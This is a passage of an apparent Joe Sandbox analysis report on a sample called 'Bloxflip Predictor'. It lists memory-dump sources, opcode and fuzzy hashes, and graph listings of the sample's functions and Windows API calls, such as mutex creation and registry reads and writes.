                                            • Snapshot File: hcaresult_2_2_6040000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c3ab6ff04b7012efd0491d4690b1d44583fa7daf71376e5f7c8fa582556b5c5
                                            • Instruction ID: ffed74b854b45defe7a25b2e5f44cee92db3960fe4f39894d7fe092fb92e228b
                                            • Opcode Fuzzy Hash: 4c3ab6ff04b7012efd0491d4690b1d44583fa7daf71376e5f7c8fa582556b5c5
                                            • Instruction Fuzzy Hash: 2DE0DFB29412046BD3208E06AC46F63FBD8DB94A30F08C46BED081B742E172B6188EF5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504334004.00000000011CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ca000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e98f239544e3ba6a5a7e38d6f69cc00f670c56cc815fff430f5e8a741a20fe20
                                            • Instruction ID: f5cf23b3cf167dda46711e33193ec57c7f3f62d771d955fc2885ee683e29e956
                                            • Opcode Fuzzy Hash: e98f239544e3ba6a5a7e38d6f69cc00f670c56cc815fff430f5e8a741a20fe20
                                            • Instruction Fuzzy Hash: E0E0DFB29412046BD2208E0AAC46F63FB98DB54A30F08C56BEE085B702E172B5048EF5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7cebe3aaab3bd6c2afb25958524536983ff689cb9ad3e30ad232b6e69f72f8ad
                                            • Instruction ID: 3d4740aabf470a6f118337d9ca9cceef413242162763b475c2dcb274fef17898
                                            • Opcode Fuzzy Hash: 7cebe3aaab3bd6c2afb25958524536983ff689cb9ad3e30ad232b6e69f72f8ad
                                            • Instruction Fuzzy Hash: B0E012366001149FCB14DFA4D849A9ABFF8FF49214B1040B9E509D7711DB3168058B90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504216800.00000000011B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11b2000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fae927db6c91f21cc8775c54f6192e282e05338d41768b56ba2732e0fb5c23d
                                            • Instruction ID: 244c651200ebd2dcb5024a2e536be7c7aef835dc33474f7939cacb05f1084491
                                            • Opcode Fuzzy Hash: 5fae927db6c91f21cc8775c54f6192e282e05338d41768b56ba2732e0fb5c23d
                                            • Instruction Fuzzy Hash: 90D05E793056C14FE31A9A1CC1A8BD93FE4AF61715F5A44F9E8008BB63C76CE589D600
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504216800.00000000011B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11b2000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 31030a5c8cc492f37301f3260aa93888ac4b11df3b08e931d063ac821b70ed26
                                            • Instruction ID: 7b9d3f00c4c80e02774e49a69c435657c6537f30abf5b7cec0a74d88f87c9ff7
                                            • Opcode Fuzzy Hash: 31030a5c8cc492f37301f3260aa93888ac4b11df3b08e931d063ac821b70ed26
                                            • Instruction Fuzzy Hash: 22D05E342052814BD719DA0CC6D4F993BD4AB58B14F0644E8AC108B772C7B4E8C9CA00
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c56a8331edd965237927370e75a107628ba3fead4bdc132aac39754ff159e745
                                            • Instruction ID: e70fd269a48ea7c801c98a3f5c688d6e2301f61c30ec838a34b22ee85461bf00
                                            • Opcode Fuzzy Hash: c56a8331edd965237927370e75a107628ba3fead4bdc132aac39754ff159e745
                                            • Instruction Fuzzy Hash: CBC08C36A000358B4F1037F970052DCF310EAD402D704402AC128821008F24801407A3

                                            Execution Graph

                                            Execution Coverage:18.5%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:22
                                            Total number of Limit Nodes:1
                                            execution_graph 772 165ae66 774 165ae9e CreateMutexW 772->774 775 165aee1 774->775 800 165ab81 802 165abb2 RegQueryValueExW 800->802 803 165ac3b 802->803 792 165ae32 794 165ae66 CreateMutexW 792->794 795 165aee1 794->795 804 165ac82 805 165aca6 RegSetValueExW 804->805 807 165ad27 805->807 796 165a23c 797 165a25e CloseHandle 796->797 799 165a298 797->799 788 165a25e 789 165a2c9 788->789 790 165a28a CloseHandle 788->790 789->790 791 165a298 790->791 808 165a51a 809 165a54e GetTokenInformation 808->809 811 165a5c0 809->811

                                            Callgraph

                                            • Executed
                                            • Not Executed
                                            • Opacity -> Relevance
                                            • Disassembly available
                                            callgraph 0 Function_01652364 1 Function_01652264 2 Function_0168066A 3 Function_0165AE66 4 Function_0168026D 5 Function_0165AD60 6 Function_05760370 7 Function_016805E0 6->7 25 Function_057605D1 6->25 63 Function_01680606 6->63 8 Function_0165A86E 9 Function_0165A46A 10 Function_016523F4 11 Function_0165A1F4 12 Function_016521F0 13 Function_05760360 13->7 13->25 13->63 14 Function_0168067F 15 Function_0165A172 16 Function_0165A6FD 17 Function_0165AAFC 18 Function_0165AC7C 19 Function_0165257F 20 Function_01680074 21 Function_0165A078 22 Function_01680648 22->2 23 Function_0165A844 24 Function_0165A646 26 Function_016805C0 27 Function_0165A54E 28 Function_0165A2D7 29 Function_0165A7D6 30 Function_016520D0 31 Function_016805D0 32 Function_0165A25E 33 Function_01652458 34 Function_0165ACA6 35 Function_0165A3A6 36 Function_0165A120 37 Function_0165A02E 38 Function_0165A4AA 39 Function_0165A7AA 40 Function_0165A736 41 Function_01652531 42 Function_01652430 43 Function_0165ABB2 44 Function_0165A9B2 45 Function_0165AE32 46 Function_016523BC 47 Function_0165213C 48 Function_0165A23C 49 Function_057605AC 49->7 49->25 49->63 50 Function_01680735 51 Function_0165AA38 52 Function_01652005 53 Function_0165A005 54 Function_0168000C 55 Function_0165AB81 56 Function_0165A380 57 Function_0165AA82 58 Function_0165AC82 59 Function_0165268D 60 Function_01680001 61 Function_0165AD8E 62 Function_0165A988 64 Function_0165A60B 65 Function_0165A30A 66 Function_01652194 67 Function_05760007 68 Function_01680710 69 Function_0165AB1E 70 Function_01652098 71 Function_0165A09A 72 Function_0165A51A

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 299 5760360-576036a 300 5760371-5760392 299->300 301 576036c-576036e 299->301 302 576039d-57603ab 300->302 301->300 304 57603b5-57603b7 302->304 305 57603c1-57603dd 304->305 307 57603e4-57603f3 305->307 308 57603fa-576047f 307->308 319 5760489-57604a1 308->319 321 57604ac-57604ec 319->321 326 57604f3-5760502 321->326 327 5760509-576058e 326->327 338 5760598-57605bd 327->338 342 57605bd call 57605d1 338->342 343 57605bd call 16805e0 338->343 344 57605bd call 1680606 338->344 341 57605c3-57605ca 342->341 343->341 344->341
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2394426750.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_5760000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c1100b5d33bc7fa99a4469e6e9a356b4bd5800fe16b8de5662d379e1a4dbc09
                                            • Instruction ID: 5ecc40d82f95f77dcefeb481e9c7a9ce48d867a4089726badd3eb9b141d4312c
                                            • Opcode Fuzzy Hash: 8c1100b5d33bc7fa99a4469e6e9a356b4bd5800fe16b8de5662d379e1a4dbc09
                                            • Instruction Fuzzy Hash: 8C510531B00201ABFF58DB719C19BAE36A3EBD5348F144138AA05DB3D4DE799D16C3A1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 345 5760370-57605bd 387 57605bd call 57605d1 345->387 388 57605bd call 16805e0 345->388 389 57605bd call 1680606 345->389 386 57605c3-57605ca 387->386 388->386 389->386
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2394426750.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_5760000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c3f615b6876cdc77e51e2a7037c99bd3d077e14858d6f7ea7b083bb859cec47
                                            • Instruction ID: 4d625bcd477391965a8aeb8638424500d363abc5aef2fb93bd58fe0b11b38b9f
                                            • Opcode Fuzzy Hash: 6c3f615b6876cdc77e51e2a7037c99bd3d077e14858d6f7ea7b083bb859cec47
                                            • Instruction Fuzzy Hash: E251F331B00205ABFF58EB719C19B6E36A3EBD5348F144138A605EB3E4DE79AD15C3A1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 165ae32-165aeb5 4 165aeb7 0->4 5 165aeba-165aec3 0->5 4->5 6 165aec5 5->6 7 165aec8-165aed1 5->7 6->7 8 165aed3-165aef7 CreateMutexW 7->8 9 165af22-165af27 7->9 12 165af29-165af2e 8->12 13 165aef9-165af1f 8->13 9->8 12->13
                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 0165AED9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0
                                            • Opcode ID: a6cf717a61de5c8cc2bbbcdffc73f8e28405da573c92232046a342e22545f598
                                            • Instruction ID: 9249f18627b4bba8341b1ac5b3d6e79e9a8e931879ad288db14cd5a2afeeed22
                                            • Opcode Fuzzy Hash: a6cf717a61de5c8cc2bbbcdffc73f8e28405da573c92232046a342e22545f598
                                            • Instruction Fuzzy Hash: 7D31A1B15093806FE722CB65DC85B96BFF8EF06314F08849AE944CB293D334E809C761

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 16 165a51a-165a5b0 21 165a5b2-165a5ba GetTokenInformation 16->21 22 165a5fd-165a602 16->22 24 165a5c0-165a5d2 21->24 22->21 25 165a604-165a609 24->25 26 165a5d4-165a5fa 24->26 25->26
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165A5B8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0
                                            • Opcode ID: 165c08df961d11275b010c9bbc37d12f91ace18a23b7e98c8e27b3d954e2a8a8
                                            • Instruction ID: ff91c2f801fc178b5719b196bbbcabb107e1d10c6d6ed6d3f6811d1444395f55
                                            • Opcode Fuzzy Hash: 165c08df961d11275b010c9bbc37d12f91ace18a23b7e98c8e27b3d954e2a8a8
                                            • Instruction Fuzzy Hash: 0D31B1715093806FDB228B64CC44F96BFB8AF16314F08849BE985CB193D324E908C772

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 29 165ab81-165abef 32 165abf4-165abfd 29->32 33 165abf1 29->33 34 165ac02-165ac08 32->34 35 165abff 32->35 33->32 36 165ac0d-165ac24 34->36 37 165ac0a 34->37 35->34 39 165ac26-165ac39 RegQueryValueExW 36->39 40 165ac5b-165ac60 36->40 37->36 41 165ac62-165ac67 39->41 42 165ac3b-165ac58 39->42 40->39 41->42
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165AC2C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 652da14450db4c9a3bef0038a1199cc573b2aa14b61350b1488dcfa03c4be519
                                            • Instruction ID: f6759a3b9cb9f4408289b2a330d11558dfd65d1d0ae7e60465b4245534f97f8e
                                            • Opcode Fuzzy Hash: 652da14450db4c9a3bef0038a1199cc573b2aa14b61350b1488dcfa03c4be519
                                            • Instruction Fuzzy Hash: 54318EB5505780AFE722CB15CC84F96BFF8EF16610F08859AE945CB292D324E909CB71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 46 165ac82-165ace3 49 165ace5 46->49 50 165ace8-165acf4 46->50 49->50 51 165acf6 50->51 52 165acf9-165ad10 50->52 51->52 54 165ad47-165ad4c 52->54 55 165ad12-165ad25 RegSetValueExW 52->55 54->55 56 165ad27-165ad44 55->56 57 165ad4e-165ad53 55->57 57->56
                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165AD18
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 3b652fb672fb2fdccead6b821776f2af7f8b97a446826cd4bfa84eb4013ab564
                                            • Instruction ID: f6ce459acc0896d37253b72edae8134cd9d2540fde871930b79a360908c91d68
                                            • Opcode Fuzzy Hash: 3b652fb672fb2fdccead6b821776f2af7f8b97a446826cd4bfa84eb4013ab564
                                            • Instruction Fuzzy Hash: 6321C172505380AFDB228B55CC44FA7BFB8EF56610F08859AE985DB652D364E808C771

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 61 165ae66-165aeb5 64 165aeb7 61->64 65 165aeba-165aec3 61->65 64->65 66 165aec5 65->66 67 165aec8-165aed1 65->67 66->67 68 165aed3-165aedb CreateMutexW 67->68 69 165af22-165af27 67->69 71 165aee1-165aef7 68->71 69->68 72 165af29-165af2e 71->72 73 165aef9-165af1f 71->73 72->73
                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 0165AED9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0
                                            • Opcode ID: 3855473710cd26de4d58487daa79ab24bbe4aa08daa7dc7f704f253eea23ad81
                                            • Instruction ID: 3f70278bb58429dc38c2167b57ee94bc4384c5b979ba2e40a133df38f8b9fb3a
                                            • Opcode Fuzzy Hash: 3855473710cd26de4d58487daa79ab24bbe4aa08daa7dc7f704f253eea23ad81
                                            • Instruction Fuzzy Hash: 0121C2715002409FEB61CF69DC85BA6FBE8EF18314F04896AED488B782D770E809CA71

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 88 165abb2-165abef 90 165abf4-165abfd 88->90 91 165abf1 88->91 92 165ac02-165ac08 90->92 93 165abff 90->93 91->90 94 165ac0d-165ac24 92->94 95 165ac0a 92->95 93->92 97 165ac26-165ac39 RegQueryValueExW 94->97 98 165ac5b-165ac60 94->98 95->94 99 165ac62-165ac67 97->99 100 165ac3b-165ac58 97->100 98->97 99->100
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165AC2C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 428a8a892f20cb14bb70b7db2a61cef073a1583b1c2987281c4abb4527ed8557
                                            • Instruction ID: 3c5b2f840ce0b6d1ea3ad8a49b5c17a6537279623de6a19c7b2c511c4fd248d6
                                            • Opcode Fuzzy Hash: 428a8a892f20cb14bb70b7db2a61cef073a1583b1c2987281c4abb4527ed8557
                                            • Instruction Fuzzy Hash: 1F2193755002049FEB61CF55CC84FA6BBECEF14714F04855AED45CB752D760E809CAB1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 76 165a54e-165a5b0 80 165a5b2-165a5ba GetTokenInformation 76->80 81 165a5fd-165a602 76->81 83 165a5c0-165a5d2 80->83 81->80 84 165a604-165a609 83->84 85 165a5d4-165a5fa 83->85 84->85
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165A5B8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0
                                            • Opcode ID: 1553502f53e413d753dc139203fb390a285c3d7d43373660084f1ec322645f39
                                            • Instruction ID: 1827012f577dd695d8a9944f345f12c05479894de15cd0111903fb1a5d5c73f2
                                            • Opcode Fuzzy Hash: 1553502f53e413d753dc139203fb390a285c3d7d43373660084f1ec322645f39
                                            • Instruction Fuzzy Hash: F111C072500204AFEB22CF55CC44FAAB7ACEF24718F04856AED05CB641D774E4488BB1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 104 165aca6-165ace3 106 165ace5 104->106 107 165ace8-165acf4 104->107 106->107 108 165acf6 107->108 109 165acf9-165ad10 107->109 108->109 111 165ad47-165ad4c 109->111 112 165ad12-165ad25 RegSetValueExW 109->112 111->112 113 165ad27-165ad44 112->113 114 165ad4e-165ad53 112->114 114->113
                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,C37A0FD8,00000000,00000000,00000000,00000000), ref: 0165AD18
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 49a9f438869fa72670615686e0c51df9b51875f6469a1aeaff4efb6642c45a17
                                            • Instruction ID: a5aa593291efd0787e621646099e21005cee3518834b33732134f4d862efad35
                                            • Opcode Fuzzy Hash: 49a9f438869fa72670615686e0c51df9b51875f6469a1aeaff4efb6642c45a17
                                            • Instruction Fuzzy Hash: D711BE72500200AFEB719F55CC41FA6BBECEF24714F04865AED459B752D761E408CAB1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 118 165a23c-165a288 120 165a2c9-165a2ce 118->120 121 165a28a-165a2aa CloseHandle 118->121 120->121 124 165a2d0-165a2d5 121->124 125 165a2ac-165a2c8 121->125 124->125
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 0165A290
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 1161dc9a85c019a769f2b1921c02b83b445c68f85074af94d810111680c669b4
                                            • Instruction ID: 820291b047ad7f733f3403258dbdf04ca4b1877f9f2a285aaacbde1f655432b2
                                            • Opcode Fuzzy Hash: 1161dc9a85c019a769f2b1921c02b83b445c68f85074af94d810111680c669b4
                                            • Instruction Fuzzy Hash: B811A371509380AFDB128F65DC95B52BFB8DF46220F0884DBED858F653D275A808CB62

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 127 165a25e-165a288 128 165a2c9-165a2ce 127->128 129 165a28a-165a292 CloseHandle 127->129 128->129 130 165a298-165a2aa 129->130 132 165a2d0-165a2d5 130->132 133 165a2ac-165a2c8 130->133 132->133
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 0165A290
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393893752.000000000165A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165A000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_165a000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 34a0e7087de90fccfb7a5589ed366993861c4a01bfafca18270826358d969527
                                            • Instruction ID: dd7ad8aaadb1c96c3d68e7989b5bfe83bdf4322848e1149777145f837267bf73
                                            • Opcode Fuzzy Hash: 34a0e7087de90fccfb7a5589ed366993861c4a01bfafca18270826358d969527
                                            • Instruction Fuzzy Hash: C201DF71A042409FDBA0CF99DC867A6FBE4DF05220F0CC4AADC098F752D375E408CAA2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 135 57605d1-57605d4 136 57605d6 135->136 137 57605da 135->137 138 57605dd-57605e0 136->138 139 57605d8 136->139 140 57605e1-57606a2 137->140 141 57605dc 137->141 138->140 139->137 153 57606b9-57606bd 140->153 141->138 154 57606a4-57606b4 153->154 155 57606bf 153->155 159 57606b6 154->159 160 57606c1-57606ea 154->160 156 57606ec-57606f3 155->156 161 57606f5-5760765 156->161 162 576076f-57607ac 156->162 159->153 160->156 161->162 174 57607b3-57607c0 162->174 175 57607ae 162->175 177 57607f7-5760858 174->177 178 57607c2-57607ec 174->178 175->174 188 57608d3-57608e4 177->188 189 576085a-5760898 177->189 178->177 192 57608e6-57608ec 188->192 193 57608ef-57608fa 188->193 189->188 192->193 196 5760900-5760907 193->196 197 5760bce-5760c0a 193->197 199 5760976-576097a 196->199 200 5760909-576093b 196->200 208 5760c0c 197->208 203 576097c-5760999 199->203 204 57609bd-57609c4 199->204 200->199 203->204 215 576099b-57609b5 203->215 206 5760bcc 204->206 207 57609ca-5760a3e 204->207 206->208 226 5760a90-5760b3f 207->226 227 5760a40-5760a89 207->227 215->204 238 5760b91 226->238 239 5760b41-5760b8a 226->239 227->226 238->206 239->238
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2394426750.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_5760000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e92e4bb3367f254c4eb941ba723b740e33574898fbbb0b34aaccf9d82f709638
                                            • Instruction ID: ce76e25f38283a6cc6c149d593ff93541dffcd2a67a62dae069c0813d3cb449f
                                            • Opcode Fuzzy Hash: e92e4bb3367f254c4eb941ba723b740e33574898fbbb0b34aaccf9d82f709638
                                            • Instruction Fuzzy Hash: 10E13730A01218CFEB14DF74D955AADB7B2FF89308F1045A9D9066B3A4DB3A9C95CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 243 5760007-576002a 244 5760031-576003e 243->244 245 576002c-576002e 243->245 246 5760045-5760060 244->246 247 5760040-5760044 244->247 245->244 250 5760062-576007e 246->250 251 5760080-576023c 246->251 247->246 250->251 280 5760246-5760358 251->280
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2394426750.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_5760000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab542f32c4f69aea0f089f36eed0f107e88f8d1f59017682fa2b37a1bf4a5aca
                                            • Instruction ID: 151ac6ea826ccbad3416e118185977838e0e0b518897442cc4a7132823f73e64
                                            • Opcode Fuzzy Hash: ab542f32c4f69aea0f089f36eed0f107e88f8d1f59017682fa2b37a1bf4a5aca
                                            • Instruction Fuzzy Hash: B5917130106382CFE315DF34EA5499A7BF2FFA530870085ADD1448B2A6DB7D9DA9CB91
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393965150.0000000001680000.00000040.00000020.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1680000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e60aaac9f3dc24a5a83922d6eebb87d35583e6abcc7ad3b122ab352e0b47b02f
                                            • Instruction ID: 5e23c645413215927f1f7d7443868345a70bd2133b57d0ec6b2c13362f8f2197
                                            • Opcode Fuzzy Hash: e60aaac9f3dc24a5a83922d6eebb87d35583e6abcc7ad3b122ab352e0b47b02f
                                            • Instruction Fuzzy Hash: E1F0A9BA5497C45FC7118F15AC40893BFF8DF8A63070984ABEC898B713D125B919CB72
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393965150.0000000001680000.00000040.00000020.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1680000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 26dea45bb5d5d4c0b1a3a3d55d81a2a75723b212f20271904d35cce69c1f1350
                                            • Instruction ID: edee0192f5c54916e699175ff24e1a240cf519cf53aa1eecec8f79046729fe29
                                            • Opcode Fuzzy Hash: 26dea45bb5d5d4c0b1a3a3d55d81a2a75723b212f20271904d35cce69c1f1350
                                            • Instruction Fuzzy Hash: 7FE092B66056008B9750CF0AEC85452F7D8EB84630708C47FDC0D8BB01D239B509CAA5
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393880178.0000000001652000.00000040.00000800.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1652000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96a7798c5c58150eb42a7643255a289dafb6bb45ba38ee2039b4cb410a9dcbe5
                                            • Instruction ID: bcf90c02b66d9e7ef96547b17fb2bfee764402e6c3bc4c2c1669bed1d08e9366
                                            • Opcode Fuzzy Hash: 96a7798c5c58150eb42a7643255a289dafb6bb45ba38ee2039b4cb410a9dcbe5
                                            • Instruction Fuzzy Hash: EAD05E792067C18FE3169A1CC5A8B993FE4AB61714F4A44FDAC008B763C768D5D1D600
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2393880178.0000000001652000.00000040.00000800.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1652000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7292fc2104b8a2534b59fe23cfe4d809ea8f45b9e328cfa487b280d24004400
                                            • Instruction ID: f063368612c78da804ffd27b9f4c8cd9d0ecf7c3aaf18c9f23293134da70274e
                                            • Opcode Fuzzy Hash: f7292fc2104b8a2534b59fe23cfe4d809ea8f45b9e328cfa487b280d24004400
                                            • Instruction Fuzzy Hash: 89D05E342002818BD715DA0CCAE4F593BD4AB50B14F0644ECAC108B762C7B4D8C5CA00
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2394426750.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_5760000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
